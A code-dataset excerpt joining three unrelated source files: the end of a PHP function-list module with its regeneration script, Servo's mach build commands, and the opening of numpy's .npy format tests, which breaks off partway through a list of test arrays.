'runkit_method_rename',
'runkit_return_value_used',
'runkit_sandbox_output_handler',
'runkit_superglobals'],
'ssdeep': ['ssdeep_fuzzy_compare',
'ssdeep_fuzzy_hash_filename',
'ssdeep_fuzzy_hash'],
'vpopmail': ['vpopmail_add_alias_domain_ex',
'vpopmail_add_alias_domain',
'vpopmail_add_domain_ex',
'vpopmail_add_domain',
'vpopmail_add_user',
'vpopmail_alias_add',
'vpopmail_alias_del_domain',
'vpopmail_alias_del',
'vpopmail_alias_get_all',
'vpopmail_alias_get',
'vpopmail_auth_user',
'vpopmail_del_domain_ex',
'vpopmail_del_domain',
'vpopmail_del_user',
'vpopmail_error',
'vpopmail_passwd',
'vpopmail_set_user_quota'],
'win32ps': ['win32_ps_list_procs', 'win32_ps_stat_mem', 'win32_ps_stat_proc'],
'win32service': ['win32_continue_service',
'win32_create_service',
'win32_delete_service',
'win32_get_last_control_message',
'win32_pause_service',
'win32_query_service_status',
'win32_set_service_status',
'win32_start_service_ctrl_dispatcher',
'win32_start_service',
'win32_stop_service'],
'xattr': ['xattr_get',
'xattr_list',
'xattr_remove',
'xattr_set',
'xattr_supported'],
'xdiff': ['xdiff_file_bdiff_size',
'xdiff_file_bdiff',
'xdiff_file_bpatch',
'xdiff_file_diff_binary',
'xdiff_file_diff',
'xdiff_file_merge3',
'xdiff_file_patch_binary',
'xdiff_file_patch',
'xdiff_file_rabdiff',
'xdiff_string_bdiff_size',
'xdiff_string_bdiff',
'xdiff_string_bpatch',
'xdiff_string_diff_binary',
'xdiff_string_diff',
'xdiff_string_merge3',
'xdiff_string_patch_binary',
'xdiff_string_patch',
'xdiff_string_rabdiff']}
if __name__ == '__main__':
import glob
import os
import pprint
import re
import shutil
import tarfile
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
PHP_MANUAL_URL = 'http://us3.php.net/distributions/manual/php_manual_en.tar.gz'
PHP_MANUAL_DIR = './php-chunked-xhtml/'
PHP_REFERENCE_GLOB = 'ref.*'
PHP_FUNCTION_RE = '<a href="function\..*?\.html">(.*?)</a>'
PHP_MODULE_RE = '<title>(.*?) Functions</title>'
def get_php_functions():
function_re = re.compile(PHP_FUNCTION_RE)
module_re = re.compile(PHP_MODULE_RE)
modules = {}
for file in get_php_references():
module = ''
for line in open(file):
if not module:
search = module_re.search(line)
if search:
module = search.group(1)
modules[module] = []
elif 'href="function.' in line:
for match in function_re.finditer(line):
fn = match.group(1)
if '->' not in fn and '::' not in fn and fn not in modules[module]:
modules[module].append(fn)
if module:
# These are dummy manual pages, not actual functions
if module == 'PHP Options/Info':
modules[module].remove('main')
if module == 'Filesystem':
modules[module].remove('delete')
if not modules[module]:
del modules[module]
return modules
def get_php_references():
download = urlretrieve(PHP_MANUAL_URL)
tar = tarfile.open(download[0])
tar.extractall()
tar.close()
for file in glob.glob("%s%s" % (PHP_MANUAL_DIR, PHP_REFERENCE_GLOB)):
yield file
os.remove(download[0])
def regenerate(filename, modules):
f = open(filename)
try:
content = f.read()
finally:
f.close()
header = content[:content.find('MODULES = {')]
footer = content[content.find("if __name__ == '__main__':"):]
f = open(filename, 'w')
f.write(header)
f.write('MODULES = %s\n\n' % pprint.pformat(modules))
f.write(footer)
f.close()
def run():
print('>> Downloading Function Index')
modules = get_php_functions()
total = sum(len(v) for v in modules.values())
print('%d functions found' % total)
regenerate(__file__, modules)
shutil.rmtree(PHP_MANUAL_DIR)
run()
| mit | -7,808,615,889,447,388,000 | 31.437697 | 94 | 0.446781 | false |
walac/servo | python/servo/build_commands.py | 3 | 12824 | # Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
from __future__ import print_function, unicode_literals
import os
import os.path as path
import subprocess
import sys
from time import time
from mach.decorators import (
CommandArgument,
CommandProvider,
Command,
)
from servo.command_base import CommandBase, cd
def is_headless_build():
return int(os.getenv('SERVO_HEADLESS', 0)) == 1
def notify_linux(title, text):
try:
import dbus
bus = dbus.SessionBus()
notify_obj = bus.get_object("org.freedesktop.Notifications", "/org/freedesktop/Notifications")
method = notify_obj.get_dbus_method("Notify", "org.freedesktop.Notifications")
method(title, 0, "", text, "", [], [], -1)
except:
raise Exception("Please make sure that the Python dbus module is installed!")
def notify_win(title, text):
from ctypes import Structure, windll, POINTER, sizeof
from ctypes.wintypes import DWORD, HANDLE, WINFUNCTYPE, BOOL, UINT
class FLASHWINDOW(Structure):
_fields_ = [("cbSize", UINT),
("hwnd", HANDLE),
("dwFlags", DWORD),
("uCount", UINT),
("dwTimeout", DWORD)]
FlashWindowExProto = WINFUNCTYPE(BOOL, POINTER(FLASHWINDOW))
FlashWindowEx = FlashWindowExProto(("FlashWindowEx", windll.user32))
FLASHW_CAPTION = 0x01
FLASHW_TRAY = 0x02
FLASHW_TIMERNOFG = 0x0C
params = FLASHWINDOW(sizeof(FLASHWINDOW),
windll.kernel32.GetConsoleWindow(),
FLASHW_CAPTION | FLASHW_TRAY | FLASHW_TIMERNOFG, 3, 0)
FlashWindowEx(params)
def notify_darwin(title, text):
try:
import Foundation
import objc
NSUserNotification = objc.lookUpClass("NSUserNotification")
NSUserNotificationCenter = objc.lookUpClass("NSUserNotificationCenter")
note = NSUserNotification.alloc().init()
note.setTitle_(title)
note.setInformativeText_(text)
now = Foundation.NSDate.dateWithTimeInterval_sinceDate_(0, Foundation.NSDate.date())
note.setDeliveryDate_(now)
centre = NSUserNotificationCenter.defaultUserNotificationCenter()
centre.scheduleNotification_(note)
except ImportError:
raise Exception("Please make sure that the Python pyobjc module is installed!")
def notify_build_done(elapsed):
"""Generate desktop notification when build is complete and the
elapsed build time was longer than 30 seconds."""
if elapsed > 30:
notify("Servo build", "Completed in %0.2fs" % elapsed)
def notify(title, text):
"""Generate a desktop notification using appropriate means on
supported platforms Linux, Windows, and Mac OS. On unsupported
platforms, this function acts as a no-op."""
platforms = {
"linux": notify_linux,
"win": notify_win,
"darwin": notify_darwin
}
func = platforms.get(sys.platform)
if func is not None:
try:
func(title, text)
except Exception as e:
extra = getattr(e, "message", "")
print("[Warning] Could not generate notification! %s" % extra, file=sys.stderr)
def call(*args, **kwargs):
"""Wrap `subprocess.call`, printing the command if verbose=True."""
verbose = kwargs.pop('verbose', False)
if verbose:
print(' '.join(args[0]))
return subprocess.call(*args, **kwargs)
@CommandProvider
class MachCommands(CommandBase):
@Command('build',
description='Build Servo',
category='build')
@CommandArgument('--target', '-t',
default=None,
help='Cross compile for given target platform')
@CommandArgument('--release', '-r',
action='store_true',
help='Build in release mode')
@CommandArgument('--dev', '-d',
action='store_true',
help='Build in development mode')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--android',
default=None,
action='store_true',
help='Build for Android')
@CommandArgument('--debug-mozjs',
default=None,
action='store_true',
help='Enable debug assertions in mozjs')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('params', nargs='...',
help="Command-line arguments to be passed through to Cargo")
def build(self, target=None, release=False, dev=False, jobs=None,
android=None, verbose=False, debug_mozjs=False, params=None):
if android is None:
android = self.config["build"]["android"]
opts = params or []
features = []
base_path = self.get_target_dir()
release_path = path.join(base_path, "release", "servo")
dev_path = path.join(base_path, "debug", "servo")
release_exists = path.exists(release_path)
dev_exists = path.exists(dev_path)
if not (release or dev):
if self.config["build"]["mode"] == "dev":
dev = True
elif self.config["build"]["mode"] == "release":
release = True
elif release_exists and not dev_exists:
release = True
elif dev_exists and not release_exists:
dev = True
else:
print("Please specify either --dev (-d) for a development")
print(" build, or --release (-r) for an optimized build.")
sys.exit(1)
if release and dev:
print("Please specify either --dev or --release.")
sys.exit(1)
self.ensure_bootstrapped()
if release:
opts += ["--release"]
if target:
opts += ["--target", target]
if jobs is not None:
opts += ["-j", jobs]
if verbose:
opts += ["-v"]
if android:
# Ensure the APK builder submodule has been built first
apk_builder_dir = "support/android-rs-glue"
with cd(path.join(apk_builder_dir, "apk-builder")):
status = call(["cargo", "build"], env=self.build_env(), verbose=verbose)
if status:
return status
opts += ["--target", "arm-linux-androideabi"]
if debug_mozjs or self.config["build"]["debug-mozjs"]:
features += ["script/debugmozjs"]
if is_headless_build():
opts += ["--no-default-features"]
features += ["headless"]
if android:
features += ["android_glue"]
if features:
opts += ["--features", "%s" % ' '.join(features)]
build_start = time()
env = self.build_env()
if android:
# Build OpenSSL for android
make_cmd = ["make"]
if jobs is not None:
make_cmd += ["-j" + jobs]
with cd(self.android_support_dir()):
status = call(
make_cmd + ["-f", "openssl.makefile"],
env=self.build_env(),
verbose=verbose)
if status:
return status
openssl_dir = path.join(self.android_support_dir(), "openssl-1.0.1k")
env['OPENSSL_LIB_DIR'] = openssl_dir
env['OPENSSL_INCLUDE_DIR'] = path.join(openssl_dir, "include")
env['OPENSSL_STATIC'] = 'TRUE'
status = call(
["cargo", "build"] + opts,
env=env, cwd=self.servo_crate(), verbose=verbose)
elapsed = time() - build_start
# Generate Desktop Notification if elapsed-time > some threshold value
notify_build_done(elapsed)
print("Build completed in %0.2fs" % elapsed)
# XXX(#7339) Android build is broken
if android:
return 0
return status
@Command('build-cef',
description='Build the Chromium Embedding Framework library',
category='build')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('--release', '-r',
action='store_true',
help='Build in release mode')
def build_cef(self, jobs=None, verbose=False, release=False):
self.ensure_bootstrapped()
ret = None
opts = []
if jobs is not None:
opts += ["-j", jobs]
if verbose:
opts += ["-v"]
if release:
opts += ["--release"]
build_start = time()
with cd(path.join("ports", "cef")):
ret = call(["cargo", "build"] + opts,
env=self.build_env(), verbose=verbose)
elapsed = time() - build_start
# Generate Desktop Notification if elapsed-time > some threshold value
notify_build_done(elapsed)
print("CEF build completed in %0.2fs" % elapsed)
return ret
@Command('build-gonk',
description='Build the Gonk port',
category='build')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('--release', '-r',
action='store_true',
help='Build in release mode')
def build_gonk(self, jobs=None, verbose=False, release=False):
self.ensure_bootstrapped()
ret = None
opts = []
if jobs is not None:
opts += ["-j", jobs]
if verbose:
opts += ["-v"]
if release:
opts += ["--release"]
opts += ["--target", "arm-linux-androideabi"]
env = self.build_env(gonk=True)
build_start = time()
with cd(path.join("ports", "gonk")):
ret = call(["cargo", "build"] + opts, env=env, verbose=verbose)
elapsed = time() - build_start
# Generate Desktop Notification if elapsed-time > some threshold value
notify_build_done(elapsed)
print("Gonk build completed in %0.2fs" % elapsed)
return ret
@Command('build-tests',
description='Build the Servo test suites',
category='build')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--release', default=False, action="store_true",
help="Build tests with release mode")
def build_tests(self, jobs=None, verbose=False, release=False):
self.ensure_bootstrapped()
args = ["cargo", "test", "--no-run"]
if is_headless_build():
args += ["--no-default-features", "--features", "headless"]
if release:
args += ["--release"]
return call(
args,
env=self.build_env(), cwd=self.servo_crate(), verbose=verbose)
@Command('clean',
description='Clean the build directory.',
category='build')
@CommandArgument('--manifest-path',
default=None,
help='Path to the manifest to the package to clean')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('params', nargs='...',
help="Command-line arguments to be passed through to Cargo")
def clean(self, manifest_path, params, verbose=False):
self.ensure_bootstrapped()
opts = []
if manifest_path:
opts += ["--manifest-path", manifest_path]
if verbose:
opts += ["-v"]
opts += params
return call(["cargo", "clean"] + opts,
env=self.build_env(), cwd=self.servo_crate(), verbose=verbose)
| mpl-2.0 | -716,463,475,784,871,400 | 34.134247 | 102 | 0.551622 | false |
Denisolt/Tensorflow_Chat_Bot | local/lib/python2.7/site-packages/numpy/lib/tests/test_format.py | 27 | 34230 | from __future__ import division, absolute_import, print_function
r''' Test the .npy file format.
Set up:
>>> import sys
>>> from io import BytesIO
>>> from numpy.lib import format
>>>
>>> scalars = [
... np.uint8,
... np.int8,
... np.uint16,
... np.int16,
... np.uint32,
... np.int32,
... np.uint64,
... np.int64,
... np.float32,
... np.float64,
... np.complex64,
... np.complex128,
... object,
... ]
>>>
>>> basic_arrays = []
>>>
>>> for scalar in scalars:
... for endian in '<>':
... dtype = np.dtype(scalar).newbyteorder(endian)
... basic = np.arange(15).astype(dtype)
... basic_arrays.extend([
... np.array([], dtype=dtype),
... np.array(10, dtype=dtype),
... basic,
... basic.reshape((3,5)),
... basic.reshape((3,5)).T,
... basic.reshape((3,5))[::-1,::2],
... ])
...
>>>
>>> Pdescr = [
... ('x', 'i4', (2,)),
... ('y', 'f8', (2, 2)),
... ('z', 'u1')]
>>>
>>>
>>> PbufferT = [
... ([3,2], [[6.,4.],[6.,4.]], 8),
... ([4,3], [[7.,5.],[7.,5.]], 9),
... ]
>>>
>>>
>>> Ndescr = [
... ('x', 'i4', (2,)),
... ('Info', [
... ('value', 'c16'),
... ('y2', 'f8'),
... ('Info2', [
... ('name', 'S2'),
... ('value', 'c16', (2,)),
... ('y3', 'f8', (2,)),
... ('z3', 'u4', (2,))]),
... ('name', 'S2'),
... ('z2', 'b1')]),
... ('color', 'S2'),
... ('info', [
... ('Name', 'U8'),
... ('Value', 'c16')]),
... ('y', 'f8', (2, 2)),
... ('z', 'u1')]
>>>
>>>
>>> NbufferT = [
... ([3,2], (6j, 6., ('nn', [6j,4j], [6.,4.], [1,2]), 'NN', True), 'cc', ('NN', 6j), [[6.,4.],[6.,4.]], 8),
... ([4,3], (7j, 7., ('oo', [7j,5j], [7.,5.], [2,1]), 'OO', False), 'dd', ('OO', 7j), [[7.,5.],[7.,5.]], 9),
... ]
>>>
>>>
>>> record_arrays = [
... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')),
... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')),
... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')),
... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')),
... ]
Test the magic string writing.
>>> format.magic(1, 0)
'\x93NUMPY\x01\x00'
>>> format.magic(0, 0)
'\x93NUMPY\x00\x00'
>>> format.magic(255, 255)
'\x93NUMPY\xff\xff'
>>> format.magic(2, 5)
'\x93NUMPY\x02\x05'
Test the magic string reading.
>>> format.read_magic(BytesIO(format.magic(1, 0)))
(1, 0)
>>> format.read_magic(BytesIO(format.magic(0, 0)))
(0, 0)
>>> format.read_magic(BytesIO(format.magic(255, 255)))
(255, 255)
>>> format.read_magic(BytesIO(format.magic(2, 5)))
(2, 5)
Test the header writing.
>>> for arr in basic_arrays + record_arrays:
... f = BytesIO()
... format.write_array_header_1_0(f, arr) # XXX: arr is not a dict, items gets called on it
... print(repr(f.getvalue()))
...
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<u2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>u2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<i2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>i2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<u4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>u4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<i4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>i4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<u8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>u8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<i8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>i8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<f4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>f4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<f8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>f8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<c8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>c8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<c16', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>c16', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n"
"v\x00{'descr': [('x', '<i4', (2,)), ('y', '<f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
"\x16\x02{'descr': [('x', '<i4', (2,)),\n ('Info',\n [('value', '<c16'),\n ('y2', '<f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '<c16', (2,)),\n ('y3', '<f8', (2,)),\n ('z3', '<u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '<U8'), ('Value', '<c16')]),\n ('y', '<f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
"v\x00{'descr': [('x', '>i4', (2,)), ('y', '>f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
"\x16\x02{'descr': [('x', '>i4', (2,)),\n ('Info',\n [('value', '>c16'),\n ('y2', '>f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '>c16', (2,)),\n ('y3', '>f8', (2,)),\n ('z3', '>u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '>U8'), ('Value', '>c16')]),\n ('y', '>f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
'''
import sys
import os
import shutil
import tempfile
import warnings
from io import BytesIO
import numpy as np
from numpy.compat import asbytes, asbytes_nested, sixu
from numpy.testing import (
run_module_suite, assert_, assert_array_equal, assert_raises, raises,
dec, SkipTest
)
from numpy.lib import format
tempdir = None
# Module-level setup.
def setup_module():
global tempdir
tempdir = tempfile.mkdtemp()
def teardown_module():
global tempdir
if tempdir is not None and os.path.isdir(tempdir):
shutil.rmtree(tempdir)
tempdir = None
# Generate some basic arrays to test with.
scalars = [
np.uint8,
np.int8,
np.uint16,
np.int16,
np.uint32,
np.int32,
np.uint64,
np.int64,
np.float32,
np.float64,
np.complex64,
np.complex128,
object,
]
basic_arrays = []
for scalar in scalars:
for endian in '<>':
dtype = np.dtype(scalar).newbyteorder(endian)
basic = np.arange(1500).astype(dtype)
basic_arrays.extend([
# Empty
np.array([], dtype=dtype),
# Rank-0
np.array(10, dtype=dtype),
# 1-D
basic,
# 2-D C-contiguous
basic.reshape((30, 50)),
# 2-D F-contiguous
basic.reshape((30, 50)).T,
# 2-D non-contiguous
